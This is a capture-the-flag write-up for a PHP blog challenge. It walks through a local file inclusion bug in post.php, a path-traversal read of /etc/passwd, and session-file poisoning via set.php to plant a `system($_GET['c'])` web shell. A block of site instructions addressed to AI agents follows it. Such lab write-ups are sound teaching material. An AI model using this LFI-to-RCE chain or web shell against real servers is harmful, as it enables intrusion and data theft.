# Custom Blog

## Description

> This guy wrote his own blog in PHP instead of, I dunno, literally anything else. Can you teach him a lesson?

{% file src="/files/JuB9LZuZPCmlh7GhvR4A" %}

## Solution

The first thing to notice is that in `/post.php`, there is a local file inclusion (LFI) vulnerability.

```php
<?php
  session_start();

  if (isset($_GET['post']) && file_exists($post = 'posts/' . $_GET['post'])) {
    $ok = true;
  } else {
    $ok = false;
    http_response_code(404);
  }

  ...
  
  if ($ok) {
    echo '<h1>' . htmlentities($_GET['post']) . '</h1><hr><div class="post">';
    include $post;
    echo '</div>';
  } else {
    echo '<h1>post not found :(</h1><hr>';
  }
  ...
?>
```

The `post` GET query parameter is used as the filename in the `include $post` statement. For instance, we could request `/post.php?post=../../../../../../etc/passwd`.

![](/files/G46kCWrNTz2NCX4XhCsA)

But what we really want is remote code execution (RCE). How do we do that? We need to be able to write to a file stored on the server, then include that file through the above LFI vulnerability.

After doing some research, I found that PHP sessions are file-based by default, and the filenames are pretty predictable - each user's session file is stored at `/tmp/sess_<PHPSESSID>`.

If we look at `/set.php`, we can see that we are able to set the `theme` value in the session to any arbitrary string through the `theme` GET query parameter.

```php
<?php
  session_start();

  if (isset($_GET['theme'])) {
    $_SESSION['theme'] = $_GET['theme'];
  }

  header('Location: /');
  die();
?>
```

The session file can then be accessed through the LFI vulnerability, and our input is reflected into the included PHP code! For example, if we set our `theme` to `<?php phpinfo() ?>`, we get the following output when including our session file.

![](/files/Gm79iCv40PRhU4rHe7LR)

If we set the theme to the following PHP payload, we can get a web shell: `/set.php?theme=<?php system($_GET['c']) ?>`

![](/files/XQMxs21bTQn9s5LlTSW7)

Explore the filesystem for a bit and you'll find the flag: `MetaCTF{wh4t??lfi_1s_ev0lv1ng??}`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ctf.zeyu2001.com/2021/metactf-cybergames/custom-blog.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.